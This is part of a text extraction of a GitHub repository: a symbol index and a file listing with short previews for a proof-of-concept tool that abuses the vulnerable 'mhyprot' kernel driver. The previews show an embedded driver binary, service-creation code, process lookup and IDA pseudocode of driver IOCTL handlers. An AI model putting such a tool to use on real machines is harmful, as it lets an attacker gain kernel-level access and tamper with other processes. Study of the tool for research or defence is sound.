type _SYSTEM_MODULE_INFORMATION_ENTRY (line 131) | struct _SYSTEM_MODULE_INFORMATION_ENTRY
type _SYSTEM_MODULE_INFORMATION (line 147) | struct _SYSTEM_MODULE_INFORMATION
FILE: src/raw_driver.hpp
type resource (line 4) | namespace resource
FILE: src/service_utils.cpp
function SC_HANDLE (line 6) | SC_HANDLE service_utils::open_sc_manager()
function SC_HANDLE (line 15) | SC_HANDLE service_utils::create_service(const std::string_view driver_path)
FILE: src/service_utils.hpp
type service_utils (line 16) | namespace service_utils
FILE: src/sup.hpp
type sup (line 8) | namespace sup
function perform_tests (line 13) | __forceinline void perform_tests(const uint32_t process_id)
FILE: src/win_utils.hpp
type win_utils (line 13) | namespace win_utils
Condensed preview: 25 files, each showing path, character count, and a content snippet.
[
{
"path": ".gitignore",
"chars": 6217,
"preview": "## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## G"
},
{
"path": ".gitmodules",
"chars": 97,
"preview": "[submodule \"libmhyprot\"]\n\tpath = libmhyprot\n\turl = https://github.com/kkent030315/libmhyprot.git\n"
},
{
"path": "IDA/FUN_0001d000.cpp",
"chars": 9319,
"preview": "//\n// Pseudocode\n//\n\nulonglong IOCTL_FUN_0001d000(\nuint param_1,\nulonglong *param_2,\nuint param_3,\nulonglong **param_4,\n"
},
{
"path": "IDA/FUN_0001d6e0.cpp",
"chars": 5914,
"preview": "\n/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */\n\n//\n// Pseudocode\n//\n\nundefined8 I"
},
{
"path": "IDA/sub_FFFFF800188CD000.txt",
"chars": 28624,
"preview": "PAGE:FFFFF800188CD000 ; =============== S U B R O U T I N E =======================================\nPAGE:FFFFF800188CD00"
},
{
"path": "IDA/sub_FFFFF800188CD6E0.txt",
"chars": 19844,
"preview": "PAGE:FFFFF800188CD6E0 ; =============== S U B R O U T I N E =======================================\nPAGE:FFFFF800188CD6E"
},
{
"path": "LICENSE",
"chars": 1066,
"preview": "MIT License\n\nCopyright (c) 2020 Kento Oki\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\n"
},
{
"path": "README.md",
"chars": 13028,
"preview": "\n\n\n\n# evil-mhyprot-cli\nA PoC for vulnerable driver \"mhypr"
},
{
"path": "evil-mhyprot-cli.sln",
"chars": 2018,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.3032"
},
{
"path": "seedmap.txt",
"chars": 12456,
"preview": "[+] seedmap (00000): 0x4068070C4A24D178\n[+] seedmap (00001): 0x6999A42A61B1639\n[+] seedmap (00002): 0xDC4C2DCFD11B8DA\n[+"
},
{
"path": "src/evil-mhyprot-cli.filters",
"chars": 2081,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "src/evil-mhyprot-cli.vcxproj",
"chars": 7723,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
},
{
"path": "src/file_utils.cpp",
"chars": 393,
"preview": "#include \"file_utils.hpp\"\n\n//\n// create file from memory\n//\nbool file_utils::create_file_from_buffer(\n\tconst std::string"
},
{
"path": "src/file_utils.hpp",
"chars": 188,
"preview": "#pragma once\n#include <Windows.h>\n#include <string>\n#include <fstream>\n\nnamespace file_utils\n{\n\tbool create_file_from_bu"
},
{
"path": "src/logger.hpp",
"chars": 287,
"preview": "#pragma once\n#include <iostream>\n\n#define LOG_ERROR() \\\n\tlogger::log(\"[!] failed at in %s:%d, (0x%lX)\\n\", __FILE__, __LI"
},
{
"path": "src/main.cpp",
"chars": 2014,
"preview": "#include <iostream>\n\n#include \"logger.hpp\"\n#include \"win_utils.hpp\"\n#include \"mhyprot.hpp\"\n#include \"sup.hpp\"\n\n#define C"
},
{
"path": "src/mhyprot.cpp",
"chars": 8686,
"preview": "#include \"mhyprot.hpp\"\n\n//\n// initialization of its service and device\n//\nbool mhyprot::init()\n{\n logger::log(\"[>] lo"
},
{
"path": "src/mhyprot.hpp",
"chars": 2543,
"preview": "#pragma once\n#include <Windows.h>\n#include <fstream>\n#include <filesystem>\n\n#include \"logger.hpp\"\n#include \"raw_driver.h"
},
{
"path": "src/nt.hpp",
"chars": 7185,
"preview": "#pragma once\n#include <Windows.h>\n\n//\n// windows native definitions\n//\n\n#ifndef NT_SUCCESS\n#define NT_SUCCESS(Status) (("
},
{
"path": "src/raw_driver.hpp",
"chars": 7831020,
"preview": "#pragma once\n#include <cstdint>\n\nnamespace resource\n{\n\tconst uint8_t raw_driver[] =\n\t{\n\t\t0x4D, 0x5A, 0x90, 0x00, 0x03, 0"
},
{
"path": "src/service_utils.cpp",
"chars": 3146,
"preview": "#include \"service_utils.hpp\"\n\n//\n// open service control manager to operate services\n//\nSC_HANDLE service_utils::open_sc"
},
{
"path": "src/service_utils.hpp",
"chars": 723,
"preview": "#pragma once\n#include <Windows.h>\n#include <string>\n\n#include \"logger.hpp\"\n#include \"win_utils.hpp\"\n#include \"mhyprot.hp"
},
{
"path": "src/sup.hpp",
"chars": 1578,
"preview": "#pragma once\n#include <Windows.h>\n\n#include \"logger.hpp\"\n#include \"win_utils.hpp\"\n#include \"mhyprot.hpp\"\n\nnamespace sup\n"
},
{
"path": "src/win_utils.cpp",
"chars": 3646,
"preview": "#include \"win_utils.hpp\"\n\n//\n// find the process id by specific name using ToolHelp32Snapshot\n//\nuint32_t win_utils::fin"
},
{
"path": "src/win_utils.hpp",
"chars": 565,
"preview": "#pragma once\n#include <Windows.h>\n#include <string>\n#include <memory>\n#include <TlHelp32.h>\n\n#include \"logger.hpp\"\n#incl"
}
]
About this extraction
This page contains the full source code of the leeza007/evil-mhyprot-cli GitHub repository, extracted and formatted as plain text. The extraction includes 25 files (7.6 MB), approximately 2.0M tokens, and a symbol index with 25 extracted functions, classes, methods, constants, and types.